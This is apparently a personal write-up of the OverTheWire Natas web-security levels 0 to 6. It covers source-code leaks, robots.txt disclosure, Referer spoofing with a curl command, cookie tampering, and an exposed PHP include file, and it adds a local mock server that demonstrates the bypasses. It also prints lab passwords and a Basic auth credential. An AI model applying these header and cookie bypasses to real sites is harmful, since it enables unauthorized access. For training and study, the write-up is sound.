Natas0-6
nurfitri •Natas Online Web security training.
- my write-up for Natas
NATAS0
- the vulnerability here is a sensitive information leak:
- the answer is in the page's HTML source (view source).
- pass: gtVrDuiDfck831PqWsLEZy5gyDz1clto
NATAS1
- same as before, but right-click is disabled.
- disabling right-click is just a client-side JavaScript handler; it does nothing to protect the source, and the browser still has it.
- we can view the source with CTRL+U,
- or open the developer tools with CTRL+SHIFT+I (CTRL+SHIFT+C opens them in element-inspect mode).
- pass: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
NATAS2
- still a sensitive information leak, but instead of being in the current page's source,
- it is in another directory path called files/, and browsing to that directory lists its contents.
- there we found users.txt:
# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:XXXXXXXXXXXXXXXXXXXXXXXXXX
eve:zo4mJWyNj2
mallory:9urtcpzBmH
NATAS3
- here there is nothing on the webpage itself,
- but there is a clue saying that not even Google can find it.
- the thing that stops Google from indexing a path on a website is called robots.txt:
- this plain text file asks search-engine crawlers not to index the paths listed in its Disallow entries.
- it is only a request to well-behaved crawlers, not an access control; every path listed in it is still reachable from a browser, and listing a path there advertises it to anyone who reads the file.
- navigating to /robots.txt, we see it disallows crawlers from a folder named /s3cr3t.
- there we found users.txt containing
natas4:XXXXXXXXXXXXXXXXXXXXXXXXXX
- read more on robots.txt here
NATAS4
- from here on things get more interesting.
- the webpage says something like this:
- let's open the developer console and look at our request under the Network tab.
- what we are focusing on is our request for the webpage itself.
- it seems the webpage is checking where we came from, i.e. the Referer header of our request.
- from a quick Google search, we find that if we change the Referer header we can tell the website which page we are coming from.
- the Referer header is set by the browser but is entirely under the client's control, so a server must never treat it as an authorization check; that is exactly the mistake this level makes.
- so now we need a way to change our request headers.
- there are a few ways to do this, such as:
- using Burp Suite
- using Postman
- using curl.
- I prefer curl, but you can try the other methods.
- to use curl, we first need to copy the Authorization header value from our request (the HTTP Basic credentials natas4:password, base64 encoded):
Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
- alternatively we can use the -u option with the username:password of natas4 and let curl build that header for us.
- then we can start constructing our request:
- we use -H to set the Authorization header to the value we copied earlier,
- then we use -e to change the Referer to http://natas5.natas.labs.overthewire.org/
- alternatively we can also use -H "Referer: ..." to set the Referer header.
- -H simply sets a request header (one -H per header),
- -b sets a cookie,
- -A sets the User-Agent.
- our curl request ends up looking like this:
curl -H "Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va" -e "http://natas5.natas.labs.overthewire.org/" http://natas4.natas.labs.overthewire.org/index.php | grep natas5
- we pipe the output into grep to pull out the line containing the password.
- after running it, we get:
Access granted. The password for natas5 is XXXXXXXXXXXXXXXXXXXXXXXXXX
NATAS5
- here we get "Access disallowed. We are not logged in."
- there are a few possibilities here; login state is usually associated with a session, and the session is identified by a cookie.
- let's take a look at the request and cookies via the developer console.
- here we can see there is a cookie called loggedin, and it is set to 0.
- let's try changing it to 1: the server stores its login state in a cookie the client controls, instead of in a server-side session keyed by an unguessable ID, so the client can simply claim to be logged in.
- in the dev console, go to Application tab > Storage > Cookies > click on natas5.
- here we can see the cookies used for this website.
- simply double-click the value 0 of loggedin to edit it.
- after editing, refresh the page.
- we get:
Access granted. The password for natas6 is XXXXXXXXXXXXXXXXXXXXXXXXXX
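The natas3, natas4 and natas5 checks above all share the same flaw: the server decides access from something the client chooses (a robots.txt entry that only asks crawlers to stay away, a Referer header, a loggedin cookie). The following is an added example, not code from the original write-up or from OverTheWire: a small local mock server that reproduces those three checks, plus a client that performs the same bypasses offline. Every path, message and "password" in it is constructed for the demo, and the expected Referer value is an assumed stand-in for the natas5 URL.

```python
# Added example: local mock of the natas3/4/5 checks and their bypasses.
# All paths, responses and "passwords" below are constructed for this demo.
import http.client
import http.server
import socketserver
import threading
import urllib.parse
from http.cookies import SimpleCookie

EXPECTED_REFERER = "http://natas5.example.test/"  # assumed stand-in for the natas5 URL
ROBOTS = "User-agent: *\nDisallow: /s3cr3t\n"      # constructed robots.txt
USERS = "# username:password\nnatas4:FAKEPASSWORD4\n"  # constructed users.txt


class MockNatas(http.server.BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the demo quiet
        pass

    def _send(self, body, status=200):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        path = urllib.parse.urlparse(self.path).path
        if path == "/robots.txt":
            self._send(ROBOTS)
        elif path == "/s3cr3t/users.txt":
            # natas3: robots.txt only asks crawlers to stay away; nothing enforces it
            self._send(USERS)
        elif path == "/natas4/":
            # natas4: "authorization" based on the client-supplied Referer header
            if self.headers.get("Referer") == EXPECTED_REFERER:
                self._send("Access granted. The password for natas5 is FAKEPASSWORD5")
            else:
                self._send("Access disallowed. You are visiting from %r"
                           % self.headers.get("Referer", ""))
        elif path == "/natas5/":
            # natas5: login state read straight from a client-controlled cookie
            cookie = SimpleCookie(self.headers.get("Cookie", ""))
            if "loggedin" in cookie and cookie["loggedin"].value == "1":
                self._send("Access granted. The password for natas6 is FAKEPASSWORD6")
            else:
                self._send("Access disallowed. You are not logged in")
        else:
            self._send("not found", 404)


def start_server():
    """Start the mock on a random loopback port in a background thread."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), MockNatas)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(port, path, headers=None):
    """GET path from the mock with optional extra request headers; return the body."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path, headers=headers or {})
    body = conn.getresponse().read().decode()
    conn.close()
    return body


def disallowed_paths(robots_txt):
    """Return the Disallow entries of a robots.txt body (the natas3 trick)."""
    return [line.split(":", 1)[1].strip()
            for line in robots_txt.splitlines()
            if line.lower().startswith("disallow:")]


def run_demo():
    """Run each check twice: once as a plain client, once with the bypass."""
    srv = start_server()
    port = srv.server_address[1]
    try:
        hidden = disallowed_paths(fetch(port, "/robots.txt"))
        return {
            "natas3_users": fetch(port, hidden[0] + "/users.txt"),
            "natas4_before": fetch(port, "/natas4/"),
            "natas4_after": fetch(port, "/natas4/", {"Referer": EXPECTED_REFERER}),
            "natas5_before": fetch(port, "/natas5/"),
            "natas5_after": fetch(port, "/natas5/", {"Cookie": "loggedin=1"}),
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for name, body in run_demo().items():
        print(name, "->", body.strip())
```

The client side is the same thing the curl command and the cookie edit do; the point of the mock is to see, in one place, that none of the three checks consults anything the server itself controls.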
NATAS6
- here we get an input box asking for a secret.
- inspecting the source code, we notice that the PHP code includes a file called secret.inc:
<?
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>
- the included file defines $secret, which is compared with the submitted value.
- we try to see if we can reach includes/secret.inc directly by navigating to it in the browser.
- and indeed we can: the server does not execute .inc files as PHP, so it returns the raw source, and the file contains the secret we need for the input:
<? $secret = "FOEIUWGHFEEUHOFUOIU"; ?>
- the fix is to keep included files outside the web root (or name them .php / deny them in the web server config) so they are never served directly; a strict comparison (===) instead of == would also be the safer choice for the check itself.
- submitting the secret, we get:
Access granted. The password for natas7 is XXXXXXXXXXXXXXXXXXXXXXXXXX